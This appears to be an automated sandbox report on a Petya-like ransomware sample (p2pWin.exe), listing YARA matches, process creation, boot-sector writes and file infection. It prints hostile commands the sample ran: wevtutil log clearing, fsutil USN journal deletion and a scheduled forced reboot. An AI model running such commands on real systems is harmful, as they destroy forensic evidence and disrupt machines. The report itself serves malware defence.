            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: Process Memory Space: p2pWin.exe PID: 5320, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\dllcm.datJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E57DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_02E57DEB
            Source: C:\Users\user\Desktop\p2pWin.exeFile created: C:\Windows\dllcm.datJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E57DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_02E57DEB
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E902244 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,4_2_00007FF72E902244
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E90195C NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,4_2_00007FF72E90195C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E58CBF: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,FindCloseChangeNotification,1_2_02E58CBF
            Source: dllhost.dat.1.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
            Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: SecurityJump to behavior
            Source: p2pWin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@24/63@0/3
            Source: C:\Users\user\Desktop\p2pWin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E585D0 LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_02E585D0
            Source: p2pWin.exeBinary or memory string: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQABC:\Windows;.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.exe.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.%ws.*...Microsoft Enhanced RSA and AES Cryptographic ProviderREADME.TXTQ
            Source: p2pWin.exeReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\p2pWin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\p2pWin.exe C:\Users\user\Desktop\p2pWin.exe
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\F2CD.tmp "C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\F2CD.tmp "C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Users\user\Desktop\p2pWin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E581BA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,1_2_02E581BA
            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\F2CD.tmpJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E58677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_02E58677
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
            Source: C:\Users\user\Desktop\p2pWin.exeCommand line argument: rundll32.exe0_2_00031070
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: p2pWin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb x source: dllhost.dat.1.dr
            Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb source: dllhost.dat.1.dr
            Source: Binary string: lsasrv.pdb source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: lsasrv.pdbUGP source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\src\Pstools\psexec\EXE\Release\psexec.pdb source: dllhost.dat.1.dr
            Source: Binary string: C:\Zeus \PC\documents\visual studio 2010\Projects\Keygroup\Release\Keygroup.pdb source: p2pWin.exe
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Contains functionality to check for running processes (XOR)
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_02E58677
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_000325C5 push ecx; ret 0_2_000325D8
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_0003318B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0003318B
            Source: p2pWin.exeStatic PE information: real checksum: 0x6ab82 should be: 0x6f87c

            Persistence and Installation Behavior

            barindex
            Infects executable files (exe, dll, sys, html)
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\7zFM.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\7z.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\7zG.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Writes directly to the primary disk partition (DR0)
            Source: C:\Windows\SysWOW64\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 5120 length: 5120Jump to behavior
            Contains functionality to infect the boot sector
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,FindCloseChangeNotification, \\.\PhysicalDrive01_2_02E58CBF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive1_2_02E51038
            Infects the VBR (Volume Boot Record) of the hard disk
            Source: C:\Windows\SysWOW64\rundll32.exeFile written: C: offset: 512Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dllhost.datJump to dropped file
            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dllhost.datJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
            Contains functionality to infect the boot sector
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,FindCloseChangeNotification, \\.\PhysicalDrive01_2_02E58CBF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive1_2_02E51038
            Source: C:\Users\user\Desktop\p2pWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
